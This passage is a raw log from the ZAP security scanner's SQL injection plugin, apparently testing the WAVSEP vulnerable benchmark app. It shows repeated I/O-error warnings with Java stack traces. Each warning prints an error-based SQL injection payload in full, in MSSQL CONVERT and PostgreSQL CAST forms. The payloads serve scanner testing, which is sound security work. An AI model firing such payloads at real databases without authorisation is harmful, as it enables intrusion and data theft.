org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682046 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) AND 1820=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (1820=1820) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND (2799=2799] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/) AND 1820=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (1820=1820) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND (2799=2799 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682047 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND 5595=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (5595=5595) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND 'UgEd'='UgEd] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND 5595=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (5595=5595) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND 'UgEd'='UgEd at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682047 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ AND 8008=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (8008=8008) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58)))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ AND 8008=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (8008=8008) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682048 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND 7736=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (7736=7736) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND 7736=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (7736=7736) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682049 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') AND 2840=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (2840=2840) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND ('nwRa'='nwRa] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/') AND 2840=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (2840=2840) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND ('nwRa'='nwRa at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682050 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 5174=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (5174=5174) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC)-- uLvc] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 5174=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (5174=5174) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC)-- uLvc at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682051 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND 8392=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (8392=8392) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND (3472=3472] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND 8392=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (8392=8392) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND (3472=3472 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682054 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' AND 3331=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (3331=3331) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND 'QASZ'='QASZ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/' AND 3331=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (3331=3331) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND 'QASZ'='QASZ at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682059 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 4471=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (4471=4471) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58)))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 4471=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (4471=4471) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682063 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' AND 7056=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (7056=7056) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%' AND 7056=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (7056=7056) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682066 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND 7825=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (7825=7825) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND ('Vbxh'='Vbxh] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND 7825=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (7825=7825) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND ('Vbxh'='Vbxh at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682067 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND 9856=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (9856=9856) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND 'ZYxM'='ZYxM] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 